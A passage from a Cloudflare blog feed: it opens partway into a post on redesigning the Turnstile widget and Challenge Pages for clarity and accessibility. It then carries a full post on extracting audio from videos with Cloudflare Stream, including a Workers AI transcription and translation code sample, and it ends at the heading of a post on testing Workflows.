    <p>One of the most influential books in UX design is Steve Krug's <a href="https://sensible.com/dont-make-me-think/"><u>Don't Make Me Think</u></a>. The core principle is simple: every moment a user spends trying to interpret, understand, or decode your interface is a moment of friction. And friction, especially in moments of frustration, leads to abandonment.</p><p>Our audit revealed that we were asking users to think far too much. Different pieces of information occupied the same space in the UI across different states. There was no consistent visual hierarchy. Users encountering an error state in Turnstile would find information in a completely different place than they would on a Challenge Page.</p><p>We made a fundamental decision: <b>one information architecture to rule them all</b>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3runU0ihKhNpgdw3LxNZUv/aa4bd76efb5847fde0659bccdae7242d/7.png" />
          </figure><p><sup><i>Visual diagram displaying a unified information architecture with a consistent structure across Turnstile widget and Challenge pages</i></sup></p><p>Both Turnstile and Challenge Pages would now follow the same structural pattern. The same visual hierarchy. The same placement for actions, for explanatory text, for links to documentation.</p><p>Did this constrain our design options? Absolutely. We had to say no to a lot of creative ideas that didn't fit the framework. But constraints aren't the enemy of good design — they're often its best friend. By limiting our options, we could go deeper on the details that actually mattered.</p><p>For users, the benefit is profound: they don't need to re-learn what each piece of the UI means. Error states look consistent. Help links are always in the same place. Once you understand one state, you understand them all. That's cognitive load reduced to a minimum — exactly where it should be during a security verification.</p>
    <div>
      <h2>What user research taught us</h2>
      <a href="#what-user-research-taught-us">
        
      </a>
    </div>
<p>How do you keep yourself accountable when redesigning something that billions of people see? You test. A lot.</p><p>We recruited 8 participants across 8 different countries, deliberately seeking diversity in age, digital savviness, and cultural background. We weren't looking for tech-savvy early adopters — we wanted to understand how the redesign would work for everyone.</p><p>Our approach was rigorous: participants saw both the current experience and proposed changes, without knowing which was "old" or "new." We counterbalanced positioning to eliminate bias. And we didn't just test our new ideas — we also challenged our assumptions about what needed changing in the first place.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/59mmLHihbM9TewXmlYQwbO/e5db88efca948de1b31e9dc499195eb8/8.png" />
          </figure><p><sup><i>Two different versions of a Turnstile being tested in an A/B test</i></sup></p>
    <div>
      <h3>Some things didn’t need fixing</h3>
      <a href="#some-things-didnt-need-fixing">
        
      </a>
    </div>
    <p>One hypothesis: should we align with competitors? Most CAPTCHA providers show "I am human" across all states. We use distinct content — "Verify you are human," then "Verifying...," then "Success!"</p><p>Were we overcomplicating things? We tested it head-to-head.</p><p>Our approach won decisively. For the interactivity state, "Verify you are human" scored 5 out of 8 points versus just 3 for "I am human." For the verifying state, it was even more dramatic — 7.5 versus 0.5. Users wanted to know what was happening, not just be told what they were.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ke1kO0i7EZxZm6voQBpyn/f489bef9b66d1221aa89adb5746559b7/9.png" />
          </figure><p><sup><i>User testing results: users strongly favored our approach over the competitor-style design</i></sup></p><p>This experiment didn't ship as a feature, but it was invaluable. It gave us confidence we weren't just being different for the sake of it. Some things were already right.</p>
    <div>
      <h3>But these needed to change</h3>
      <a href="#but-these-needed-to-change">
        
      </a>
    </div>
    <p>The research surfaced four areas where we were failing users:</p><p><b>Help, not bureaucracy</b>. When users encountered errors, we offered "Send Feedback." In testing, they were baffled. "Who am I sending this to? The website? Cloudflare? My ISP?" More importantly, we discovered something fundamental: at the moment of maximum frustration, people don't want to file a report — they want to fix the problem. We replaced "Send Feedback" with "Troubleshoot" — a single word that promises action rather than bureaucracy.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2jN2reUR55qCbssCDFTZfB/fb5396ec853ee549ebfec5d0d94b901f/10.png" />
          </figure><p><sup><i>The problematic "Send Feedback" prompt: users didn't know who they were sending feedback to</i></sup></p><p><b>Attention, not alarm</b>. We'd used red backgrounds liberally for errors. The reaction in testing was visceral — participants felt they had failed, felt powerless. Even for simple issues that would resolve with a retry, users assumed the worst and gave up. Red at full saturation wasn't communicating "Here's something to address." It was communicating "You have failed, and there's nothing you can do." The fix: red only for icons, never for text or backgrounds.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5seE6Xcrj9lvSpBYDEkk6N/7f0c1c17fd86b05397d35b685b0addfb/11.png" />
</figure><p><sup><i>The evolution: from unclear error descriptions in red to clearer, more concise error communication in neutral-colored text.</i></sup></p><p><b>Scannable, not verbose</b>. We'd tried to be thorough, explaining errors in technical detail. It backfired. Non-technical users found it alienating. Technical users didn't need it. Everyone was trying to read it in the tiny real estate of a widget. The lesson: less is more, especially in constrained spaces during stressful moments.</p><p><b>Accessible to everyone</b>. Our audit revealed 10px fonts in some states. Grey text that technically met AA compliance (a contrast ratio of at least 4.5:1 for normal text and 3:1 for large text) but was difficult to read in practice. "Technically compliant" isn't good enough when you're serving the entire Internet.</p><p>We set a clear goal: to meet the <a href="https://www.w3.org/TR/WCAG22/"><u>WCAG 2.2 AAA</u></a> standard — the highest and most stringent level of web accessibility compliance, designed to make content accessible to the broadest range of users, including those with severe disabilities. Throughout the redesign, when visual consistency conflicted with readability, readability won. Every time.</p><p>This extended beyond vision. We designed for screen reader users, keyboard-only navigators, and people with color vision variations — going beyond what automated compliance tools can catch.</p><p>And accessibility isn't just about impairments — it's about language. What fits in English overflows in German. What's concise in Spanish is ambiguous in Japanese. Supporting over 40 languages forced us to radically simplify. The same "Unable to connect to website / Troubleshoot" pattern now works across English, Bulgarian, Danish, German, Greek, Japanese, Indonesian, Russian, Slovak, Slovenian, Serbian, Filipino, and many more.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6e4pvgMUS4BUXsPqi1qV6l/b6ffdc0d5f1e8e90394169db7162d10c/12.png" />
          </figure><p><sup><i>The redesigned error state across 12 languages — consistent layout despite varying text lengths </i></sup></p>
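<p>For reference, the AA and AAA contrast thresholds mentioned above come from WCAG's relative-luminance formula. A minimal sketch of that calculation (our illustration, not the widget's actual code; the constants come from the WCAG 2.x definition):</p>

```typescript
// WCAG 2.x relative luminance of an sRGB color (channel values 0-255).
function relativeLuminance(r: number, g: number, b: number): number {
  const lin = (c: number) => {
    const s = c / 255;
    // Linearize each sRGB channel per the WCAG definition.
    return s <= 0.03928 ? s / 12.92 : Math.pow((s + 0.055) / 1.055, 2.4);
  };
  return 0.2126 * lin(r) + 0.7152 * lin(g) + 0.0722 * lin(b);
}

// Contrast ratio between two colors: (lighter + 0.05) / (darker + 0.05).
function contrastRatio(
  fg: [number, number, number],
  bg: [number, number, number]
): number {
  const l1 = relativeLuminance(...fg);
  const l2 = relativeLuminance(...bg);
  const [lighter, darker] = l1 >= l2 ? [l1, l2] : [l2, l1];
  return (lighter + 0.05) / (darker + 0.05);
}

// Black on white is the maximum possible ratio, ≈ 21:1.
// AA normal text needs >= 4.5:1; AAA normal text needs >= 7:1.
console.log(contrastRatio([0, 0, 0], [255, 255, 255]));
```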
    <div>
      <h2>Final redesign</h2>
      <a href="#final-redesign">
        
      </a>
    </div>
    <p>So what did we actually ship?</p><p>First, let's talk about what we didn't change. The happy path — "Verify you are human" → "Verifying..." → "Success!" — tested exceptionally well. Users understood what was happening at each stage. The distinct content for each state, which we'd worried might be overcomplicating things, was actually our competitive advantage.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2R4QJ04uz9r1TVZjuqsHG9/61c1023eaa105b4841456258f3370220/13.png" />
          </figure><p><i><sup> The happy path: Verify you are human → Verifying → Success! These states tested well and remained largely unchanged</sup></i></p><p>But for the states that needed work, we made significant changes guided by everything we learned.</p>
    <div>
      <h3>Simplified, scannable content</h3>
      <a href="#simplified-scannable-content">
        
      </a>
    </div>
    <p>We radically reduced the amount of text in error states. Instead of verbose explanations like "Your device clock is set to a wrong time or this challenge page was accidentally cached by an intermediary and is no longer available," we now show:</p><ol><li><p>A clear, simple state name (e.g., "Incorrect device time")</p></li><li><p>A prominent "Troubleshoot" link</p></li></ol><p>That's it. The detailed guidance now lives in a dedicated modal screen that opens when users need it — giving them room to actually read and follow troubleshooting steps.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ZYjlJgw6DOiTuJBFXpewn/5d714c3a19723dfe9fa9802d0d5926b8/14.png" />
          </figure><p><sup><i>The troubleshooting modal: detailed guidance when users need it, without cluttering the widget</i></sup></p><p>The troubleshooting modal provides context ("This error occurs when your device's clock or calendar is inaccurate. To complete this website’s security verification process, your device must be set to the correct date and time in your time zone."), numbered steps to try, links to documentation, and — only after the user has tried to resolve the issue — an option to submit feedback to Cloudflare. Help first, feedback second.</p>
    <div>
      <h3>AAA accessibility compliance</h3>
      <a href="#aaa-accessibility-compliance">
        
      </a>
    </div>
    <p>Every state now meets WCAG 2.2 AAA standards for contrast and readability. Font sizes have established minimums. Interactive elements are clearly focusable and properly announced by screen readers.</p>
    <div>
      <h3>Unified experience across Turnstile and Challenge pages</h3>
      <a href="#unified-experience-across-turnstile-and-challenge-pages">
        
      </a>
    </div>
    <p>Whether users encounter the compact Turnstile widget or a full Challenge Page, the information architecture is now consistent. Same hierarchy. Same placement. Same mental model.</p><p>Challenge Pages now follow a clean structure: the website name and favicon at the top, a clear status message (like "Verification successful" or "Your browser is out of date"), and actionable guidance below. No more walls of orange or red text. No more technical jargon without context.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4PuWePTOaLihpfqm2iimJW/e34c4a009c36524a6d72c15ae0f78d00/15.png" />
          </figure><p><sup><i>Re-designed Challenge page states with clear troubleshooting instructions.</i></sup></p>
    <div>
      <h3>Validated across languages</h3>
      <a href="#validated-across-languages">
        
      </a>
    </div>
    <p>Every piece of content was tested in over 40 supported languages. Our process involved three layers of validation:</p><ol><li><p>Initial design review by the design team</p></li><li><p>Professional translation by our qualified vendor</p></li><li><p>Final review by native-speaking Cloudflare employees</p></li></ol><p>This wasn't just about translation accuracy — it was about ensuring the visual design held up when content length varied dramatically between languages.</p>
    <div>
      <h3>The complete picture</h3>
      <a href="#the-complete-picture">
        
      </a>
    </div>
    <p>The result is a security verification experience that's clearer, more accessible, less frustrating, and — crucially — just as secure. We didn't compromise on protection to improve the experience. We proved that good design and strong security aren't in conflict.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5t6FRRzLamGaTbEiZqVpnf/92b688679d1c8265ba3c6fd4159061bf/16.png" />
          </figure><p><sup><i>Re-designed Turnstile widgets on the left and a re-designed Challenge page on the right</i></sup></p><p>But designing the experience was only half the battle. Shipping it to billions of users? That's where Ana comes in.</p>
    <div>
      <h2>Part 2: Shipping to billions</h2>
      <a href="#part-2-shipping-to-billions">
        
      </a>
    </div>
    
    <div>
      <h4><b>Beyond centering a div</b></h4>
      <a href="#beyond-centering-a-div">
        
      </a>
    </div>
<p>Some may say the hardest part of being a Frontend Engineer is centering a div. In reality, the real challenge often lies much deeper, especially when working close to the platform primitives. Building a critical piece of Internet infrastructure using native APIs forces you to think differently about UI development, tradeoffs, and long-term maintainability.</p><p>In our case, we use Rust to handle the UI for both the Turnstile widget and the Challenge page. This decision brought clear benefits in terms of safety and consistency across platforms, but it also increased frontend complexity. Many of us are used to the ergonomics of modern frameworks like React, where common UI interactions come almost for free. Working with Rust meant reimplementing even simple interactions using lower-level constructs like <code>document.getElementById</code>, <code>createElement</code>, and <code>appendChild</code>.</p><p>On top of that, compile times and strict checks naturally slowed down rapid UI iteration compared to JavaScript-based frameworks. Debugging was also more involved, as the tooling ecosystem is still evolving. These constraints pushed us to be more deliberate, more thoughtful, and ultimately more disciplined in how we approached UI development.</p>
    <div>
      <h4><b>Small visual changes, big global impact</b></h4>
      <a href="#small-visual-changes-big-global-impact">
        
      </a>
    </div>
<p>What initially looked like small visual tweaks, such as padding adjustments or alignment changes, quickly revealed a much bigger challenge: internationalization.</p><p>Once translations were available, we had to ensure that content remained readable and usable across 38 languages and 16 different UI states. Text length variability alone required careful design decisions. Some translations can be 30 to 300 percent longer than English. A short English string like “Stuck?” becomes “Tidak bisa melanjutkan?” in Indonesian or “Es geht nicht weiter?” in German, dramatically changing layout requirements.</p><p>Right-to-left language support added another layer of complexity. Supporting Arabic, Persian (Farsi), and Hebrew meant more than flipping text direction. Entire layouts had to be mirrored, including alignment, navigation patterns, directional icons, and animation flows. Many of these elements are implicitly designed with left-to-right assumptions, so we had to revisit those decisions and make them truly bidirectional.</p><p>Ordered lists also required special care. Not every culture uses the Western 1, 2, 3 numbering system, and hardcoding numeric sequences can make interfaces feel foreign or incorrect. We leaned on locale-aware numbering and fully translatable list formats to ensure ordering felt natural and culturally appropriate in every language.</p>
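<p>The locale-aware numbering described above can be sketched with the standard <code>Intl</code> API. This is only an illustration (our widget code is in Rust, and <code>listMarker</code> is a hypothetical helper name, not part of the shipped implementation):</p>

```typescript
// Render an ordered-list marker in the numbering system of a given locale,
// instead of hardcoding Western "1, 2, 3".
function listMarker(index: number, locale: string): string {
  // Intl.NumberFormat uses the locale's default numbering system,
  // e.g. Arabic-Indic digits for ar-EG.
  return `${new Intl.NumberFormat(locale).format(index)}.`;
}

console.log(listMarker(2, "en-US")); // "2."
console.log(listMarker(2, "ar-EG")); // Arabic-Indic digit on full-ICU runtimes
```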
    <div>
      <h4><b>Building confidence through testing</b></h4>
      <a href="#building-confidence-through-testing">
        
      </a>
    </div>
    <p>As we started listing action points in feedback reports, correctness became even more critical. Every action needed to render properly, trigger the right flow, and behave consistently across states, languages, and edge cases.</p><p>To get there, we invested heavily in testing. Unit tests helped us validate logic in isolation, while end-to-end tests ensured that new states and languages worked as expected in real scenarios. This testing foundation gave us confidence to iterate safely, prevented regressions, and ensured that feedback reports remained reliable and actionable for users.</p>
    <div>
      <h4><b>The outcome</b></h4>
      <a href="#the-outcome">
        
      </a>
    </div>
    <p>What began as a set of technical constraints turned into an opportunity to build a more robust, inclusive, and well-tested UI system. Working with fewer abstractions and closer to the browser primitives forced us to rethink assumptions, improve our internationalization strategy, and raise the overall quality bar.</p><p>The result is not just a solution that works, but one we trust. And that trust is what allows us to keep improving, even when centering a div turns out to be the easy part.</p>
    <div>
      <h2>Part 3: The impact</h2>
      <a href="#part-3-the-impact">
        
      </a>
    </div>
    <p>Designing for billions of people is a responsibility we take seriously. At this scale, it is essential to leverage measurable data to tell us the real impact of our design choices. As we prepare to roll out these changes, we are focusing on <b>five key metrics</b> that will tell us if we’ve truly succeeded in making the Internet’s most-seen UI more human.</p>
    <div>
      <h4><b>1. Challenge Completion Rate</b></h4>
      <a href="#1-challenge-completion-rate">
        
      </a>
    </div>
<p>Our primary north star is the <b>Challenge Solve Rate (CSR)</b>: the percentage of issued challenges that are successfully completed. By moving away from technical jargon like "intermediary caching" and toward simple, actionable labels like "Incorrect device time," we expect a significant uptick in CSR. A higher CSR doesn't mean we're being easier on bots; it means we’re removing the hurdles that were accidentally tripping up legitimate human users.</p>
    <div>
      <h4><b>2. Time to Complete</b></h4>
      <a href="#2-time-to-complete">
        
      </a>
    </div>
    <p>Every second a user spends on a challenge page is a second they aren't getting the information that they need. Our research showed that users were often paralyzed by choice when seeing a wall of red text. With our new scannable, neutral-color design, we are tracking <b>Time to Complete</b> to ensure users can identify and resolve issues in seconds rather than minutes.</p>
    <div>
      <h4><b>3. Abandonment Rate Changes</b></h4>
      <a href="#3-abandonment-rate-changes">
        
      </a>
    </div>
    <p>In the past, our liberal use of "saturated red" caused a visceral reaction: users felt they had failed and simply gave up. By reserving red only for icons and using a unified architecture, we aim to reduce Abandonment Rates. We want users to feel empowered to click Troubleshoot rather than feeling powerless and clicking away.</p>
    <div>
      <h4><b>4. Support Ticket Volume</b></h4>
      <a href="#4-support-ticket-volume">
        
      </a>
    </div>
    <p>One of the bigger shifts from a product perspective is our new Troubleshooting Modal. By providing clear, numbered steps directly within the widget, we are building self-service support into the UI. We expect this to result in a measurable decrease in support ticket volume for both our customers and our own internal teams.</p>
    <div>
      <h4><b>5. Social Sentiment</b></h4>
      <a href="#5-social-sentiment">
        
      </a>
    </div>
    <p>We know that security challenges are rarely loved, but they shouldn't be hated because they are confusing. We are monitoring <b>Social Sentiment</b> across community forums, feedback reports, and social channels to see if the conversation shifts from "this widget is broken" to "I had an issue, but I fixed it".</p><p>As a Product Manager, my goal is often invisible security — the best challenge is the one the user never sees. But when a challenge <i>must</i> be seen, it should be an assistant, not a bouncer. This redesign proves that <b>AAA accessibility</b> and <b>high-security standards</b> aren't in competition; they are two sides of the same coin. By unifying the architecture of Turnstile and Challenge Pages, we’ve built a foundation that allows us to iterate faster and protect the Internet more humanely than ever before.</p>
    <div>
      <h2>Looking ahead</h2>
      <a href="#looking-ahead">
        
      </a>
    </div>
    <p>This redesign is a foundation, not a finish line.</p><p>We're continuing to monitor how users interact with the new experience, and we're committed to iterating based on what we learn. The feedback mechanisms we've built into the new design — the ones that actually help users troubleshoot, rather than just asking them to report problems — will give us richer insights than we've ever had before.</p><p>We're also watching how the security landscape evolves. As bot attacks grow more sophisticated, and as AI continues to blur the line between human and automated behavior, the challenge of verification will only get harder. Our job is to stay ahead — to keep improving security without making the human experience worse.</p><p>If you encounter the new Turnstile or Challenge Pages and have feedback, we want to hear it. Reach out through our <a href="https://community.cloudflare.com/"><u>community forums</u></a> or use the feedback mechanisms built into the experience itself.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Turnstile]]></category>
            <category><![CDATA[Challenge Page]]></category>
            <category><![CDATA[Design]]></category>
            <category><![CDATA[Product Design]]></category>
            <category><![CDATA[User Research]]></category>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Engineering]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Accessibility]]></category>
            <guid isPermaLink="false">19fiiQAG0XsaS9p0daOBus</guid>
            <dc:creator>Leo Bacevicius</dc:creator>
            <dc:creator>Ana Foppa</dc:creator>
            <dc:creator>Marina Elmore</dc:creator>
        </item>
        <item>
            <title><![CDATA[Extract audio from your videos with Cloudflare Stream]]></title>
            <link>https://blog.cloudflare.com/extract-audio-from-your-videos-with-cloudflare-stream/</link>
            <pubDate>Thu, 06 Nov 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare Stream provides a unified platform for video storage, encoding, and delivery. We are now enabling developers to seamlessly extract audio from videos. ]]></description>
<content:encoded><![CDATA[ <p>Cloudflare Stream loves video. But we know not every workflow needs the full picture, and the popularity of podcasts highlights how compelling stand-alone audio can be. For developers, processing a video just to access audio is slow, costly, and complex.</p><p>What makes video so expensive? A video file is a dense stack of high-resolution images, stitched together over time. As such, it is not just “one file” — it’s a container of high-dimensional data such as frames per second, resolution, and codecs. Analyzing video means traversing time × resolution × frame rate.</p>
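<p>A rough back-of-the-envelope comparison makes that gap concrete (the figures below are illustrative, uncompressed assumptions we chose for this sketch: 1080p video at 30 fps with 24-bit color, versus 48 kHz 16-bit stereo audio):</p>

```typescript
// Uncompressed data rates, in bits per second (illustrative assumptions).
const videoBps = 1920 * 1080 * 24 * 30; // 1080p, 24-bit color, 30 fps
const audioBps = 48_000 * 16 * 2;       // 48 kHz, 16-bit samples, stereo

console.log((videoBps / 1e9).toFixed(2) + " Gbps of raw video"); // 1.49 Gbps
console.log((audioBps / 1e6).toFixed(2) + " Mbps of raw audio"); // 1.54 Mbps
console.log("ratio: about " + Math.round(videoBps / audioBps) + "x"); // 972x
```

<p>Real files are compressed, of course, but the orders of magnitude carry over: audio-only pipelines move and analyze far less data.</p>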
    <div>
      <h2>Why audio extraction</h2>
      <a href="#why-audio-extraction">
        
      </a>
    </div>
    <p>By comparison, an audio file is far simpler. If an audio file consists of only one channel, it is defined as a single waveform. The technical characteristics of this waveform are defined by the sample rate (the number of audio samples taken per second), and the bit depth (the precision of each sample).</p><p>With the rise of computationally intensive AI inference pipelines, many of our customers want to perform downstream workflows that require only analyzing the audio. For example:</p><ul><li><p><b>Power AI and Machine Learning:</b> In addition to translation and transcription, you can feed the audio into Voice-to-Text models for speech recognition or analysis, or AI-powered summaries.</p></li><li><p><b>Improve content moderation:</b> Analyze the audio within your videos to ensure the content is safe and compliant.</p></li></ul><p>Using video data in such cases is expensive and unnecessary. </p><p>That’s why we’re introducing audio extraction. Through this feature, with just a single API call or click in the dashboard, you can now extract a lightweight M4A audio track from any video.</p><p>We’re introducing two flexible methods to extract audio from your videos. </p>
    <div>
      <h3>1. On-the-Fly audio extraction through Media Transformations</h3>
      <a href="#1-on-the-fly-audio-extraction-through-media-transformations">
        
      </a>
    </div>
    <p><a href="https://developers.cloudflare.com/stream/transform-videos/"><u>Media Transformations</u></a> is perfect for processing and transforming short-form videos, like social media clips, that you store anywhere you'd like. It works by fetching your media directly from its source, optimizing it at our edge, and delivering it efficiently. </p><p>We extended this workflow to include audio. By simply adding <code>mode=audio</code> to the transformation URL, you can now extract audio on-the-fly from a video file stored anywhere.</p><p>Once <a href="https://developers.cloudflare.com/stream/transform-videos/#getting-started"><u>Media Transformations is enabled for your domain</u></a>, you can extract audio from any source video. You can even clip specific sections by specifying <code>time</code> and <code>duration</code>.</p><p>For example:</p>
            <pre><code>https://example.com/cdn-cgi/media/mode=audio,time=5s,duration=10s/&lt;SOURCE-VIDEO&gt;</code></pre>
            <p>The above request generates a 10-second M4A audio clip from the source video, beginning at the 5-second mark. You can learn more about setup and other options in the <a href="https://developers.cloudflare.com/stream/transform-videos/"><u>Media Transformations documentation</u></a>. </p>
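<p>If you generate these URLs programmatically, the pieces compose simply. The helper below is our own sketch (not a Cloudflare SDK function), assuming only the <code>mode</code>, <code>time</code>, and <code>duration</code> options described above:</p>

```javascript
// Assemble a /cdn-cgi/media audio-extraction URL.
// `zone` is a domain with Media Transformations enabled;
// `sourceUrl` is the publicly reachable source video.
function buildAudioUrl(zone, sourceUrl, { time, duration } = {}) {
  const options = ["mode=audio"];
  if (time) options.push(`time=${time}`);
  if (duration) options.push(`duration=${duration}`);
  return `https://${zone}/cdn-cgi/media/${options.join(",")}/${sourceUrl}`;
}

// Reproduces the example request above, with a placeholder source video:
console.log(
  buildAudioUrl("example.com", "https://videos.example/clip.mp4", {
    time: "5s",
    duration: "10s",
  })
);
// https://example.com/cdn-cgi/media/mode=audio,time=5s,duration=10s/https://videos.example/clip.mp4
```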
    <div>
      <h3>2. Audio downloads</h3>
      <a href="#2-audio-downloads">
        
      </a>
    </div>
    <p>You can now download the audio track directly for any content that you manage within Stream. Alongside the ability to generate a downloadable MP4 for offline viewing, you can also now create and store a persistent M4A audio file.</p>
    <div>
      <h2>Workers AI demo</h2>
      <a href="#workers-ai-demo">
        
      </a>
    </div>
    <p>Here, you can see a sample piece of code that demonstrates how to use Media Transformations with one of Cloudflare’s own products — Workers AI. The following code creates a two-step process: first transcribing the video’s audio to text, then translating the transcript into Spanish.</p>
            <pre><code>export default {
  async fetch(request, env, ctx) {
    // 1. Use Media Transformations to fetch only the audio track
    const res = await fetch(
      "https://blog.cloudflare.com/cdn-cgi/media/mode=audio/https://pub-d9fcbc1abcd244c1821f38b99017347f.r2.dev/announcing-audio-mode.mp4"
    );
    const blob = await res.arrayBuffer();

    // 2. Transcribe the audio to text using Whisper
    const transcript_response = await env.AI.run(
      "@cf/openai/whisper-large-v3-turbo",
      {
        // A base64-encoded string is required by @cf/openai/whisper-large-v3-turbo
        audio: base64Encode(blob),
      }
    );

    // Check if transcription was successful and text exists
    if (!transcript_response.text) {
      return Response.json({ error: "Failed to transcribe audio." }, { status: 500 });
    }

    // 3. Translate the transcribed text using the M2M100 model
    const translation_response = await env.AI.run(
      "@cf/meta/m2m100-1.2b",
      {
        text: transcript_response.text,
        source_lang: "en", // The source language (English)
        target_lang: "es"  // The target language (Spanish)
      }
    );

    // 4. Return both the original transcription and the translation
    return Response.json({
      transcription: transcript_response.text,
      translation: translation_response.translated_text
    });
  }
};

// Convert an ArrayBuffer to a base64 string for the Whisper input
export function base64Encode(buf) {
  let string = "";
  new Uint8Array(buf).forEach(
    (byte) =&gt; { string += String.fromCharCode(byte); }
  );
  return btoa(string);
}</code></pre>
            <p>After running, the worker returns a clean JSON response containing both the transcription and the translation. A snippet of the response is shown below:</p>
            <pre><code>{
  "transcription": "I'm excited to announce that Media Transformations from Cloudflare has added audio-only mode. Now you can quickly extract and deliver just the audio from your short form video. And from there, you can transcribe it or summarize it on Worker's AI or run moderation or inference tasks easily.",
  "translation": "Estoy encantado de anunciar que Media Transformations de Cloudflare ha añadido el modo solo de audio. Ahora puede extraer y entregar rápidamente sólo el audio de su vídeo de forma corta. Y desde allí, puede transcribirlo o resumirlo en la IA de Worker o ejecutar tareas de moderación o inferencia fácilmente."
}</code></pre>
            
    <div>
      <h2>Technical details</h2>
      <a href="#technical-details">
        
      </a>
    </div>
    <p>As a summer intern on the Stream team, I worked on shipping this long-requested feature. My first step was to understand the complex architecture of Stream’s media pipelines.</p><p>When a video is processed by Stream, it can follow one of two paths. The first is our video-on-demand (VOD) pipeline, which handles videos directly uploaded to Stream. It generates and stores a set of encoded video segments for adaptive bitrate delivery via HLS/DASH. The other path is our on-the-fly-encoding (or OTFE) pipeline, which drives the Stream Live and Media Transformations services. Instead of pre-processing and storing files, OTFE fetches media from a customer’s own website and performs transformations at the edge.</p><p>My project involved extending both of these pipelines to support audio extraction.</p>
    <div>
      <h3>OTFE pipeline</h3>
      <a href="#otfe-pipeline">
        
      </a>
    </div>
    <p>The OTFE pipeline is designed for real-time operations, and the existing flow was engineered for visual tasks. When a customer with Media Transformations enabled makes a request on their own website, it’s routed to our edge servers, which act as the entry point. The request is then validated, and, per the user’s request, OTFE fetches the video and generates a resized version or a still-frame thumbnail.</p><p>In order to support audio-only extraction, I built upon our existing workflow to add a new mode. This involved:</p><ol><li><p>Extending the validation logic: Specifically for audio, a crucial validation step was to verify that the source video contained an audio track before attempting extraction. This was in addition to pre-existing validation steps that ensure the requested URL is correctly formatted. </p></li><li><p>Building a new transformation handler: This was the core of my project. I built a new handler within the OTFE platform that discards the visual tracks in order to deliver a high-quality M4A file.</p></li></ol>
    <div>
      <h3>VOD pipeline</h3>
      <a href="#vod-pipeline">
        
      </a>
    </div>
    <p>Similar to my work on OTFE, this project involved extending our current MP4 downloads workflow to support audio-only M4A downloads. This presented a series of interesting technical decisions. </p><p>The typical flow for creating a video download begins with a POST request to our main API layer, which handles authentication and validation and creates a corresponding database record. It then enqueues a job in our asynchronous queue, where workers perform the processing task. To enable audio downloads for VOD, I introduced new, type-specific API endpoints (<code>POST /downloads/{type}</code>) while preserving the legacy <code>POST /downloads</code> route as an alias for creating downloads of the default (video) type. This ensured full backward compatibility.</p><p>The core work of creating a download is performed by our asynchronous queue. This included:</p><ul><li><p>Adding logic to the consumer to detect the new audio download type</p></li><li><p>Pulling the ffmpeg template we define in our API layer to properly encode the audio stream into a high-quality M4A container</p></li></ul><p>By extending each component of this pipeline, from the API routes to the media processing commands, I was able to deliver a new, highly requested feature that unlocks audio-centric workflows for our customers!</p>
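<p>The route shape described above can be sketched as a small helper. This is an illustration of the path logic only; the real Stream API lives under an account-scoped base URL and requires authentication, and the <code>/stream/{videoId}</code> prefix here is our own assumption:</p>

```javascript
// Build the downloads route for a Stream video. POST /downloads stays as a
// legacy alias for the default (video) type, while POST /downloads/{type}
// selects a specific type such as "audio". Path prefix is illustrative.
function downloadsPath(videoId, type = "default") {
  const base = `/stream/${videoId}/downloads`;
  return type === "default" ? base : `${base}/${type}`;
}

console.log(downloadsPath("abc123"));          // /stream/abc123/downloads
console.log(downloadsPath("abc123", "audio")); // /stream/abc123/downloads/audio
```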
    <div>
      <h2>Dash screenshots</h2>
      <a href="#dash-screenshots">
        
      </a>
    </div>
    <p>We’re excited to announce that this feature is also available in the Stream dashboard. Simply navigate to any of your videos, and you’ll find the option to download the video or just the audio.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1DFBl200Npv24UfTbOBs5T/36229af550bb43305b0775a13e21e232/image5.png" />
          </figure><p>Once the download is ready, you will see the URL for the file, along with the option to disable it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1vyRvNfraFUHyZs0vz75uC/55471ea8700cec1b44932e81d89dd47d/image4.png" />
          </figure>
    <div>
      <h2>That’s a wrap</h2>
      <a href="#thats-a-wrap">
        
      </a>
    </div>
    <p>This project addressed a long-standing customer need, providing a simpler way to work with audio from video. I’m truly grateful for this entire journey, from understanding the problem to shipping the solution, and especially for the mentorship and guidance I received from my team along the way. We are excited to see how developers use this new capability to build more efficient and exciting applications on Cloudflare Stream.</p><p>You can try the audio extraction feature by <a href="https://dash.cloudflare.com"><u>uploading a video to Stream</u></a> or using the API! If you're interested in tackling these kinds of technical challenges yourself, explore our <a href="https://www.cloudflare.com/careers/early-talent/?cf_target_id=97C555BF0DA9E4427F470C0134F7E2C9"><u>internship and early talent programs</u></a> to start your own journey.</p> ]]></content:encoded>
            <category><![CDATA[Internship Experience]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Cloudflare Stream]]></category>
            <guid isPermaLink="false">6OFTw2NxvBqw0G8cr7jogY</guid>
            <dc:creator>Pakhi Sinha</dc:creator>
        </item>
        <item>
            <title><![CDATA[Building a better testing experience for Workflows, our durable execution engine for multi-step applications]]></title>
            <link>https://blog.cloudflare.com/better-testing-for-workflows/</link>
            <pubDate>Tue, 04 Nov 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ End-to-end testing for Cloudflare Workflows was challenging. We're introducing first-class support for Workflows in cloudflare:test, enabling full introspection, mocking, and isolated, reliable tests for your most complex applications. ]]></description>
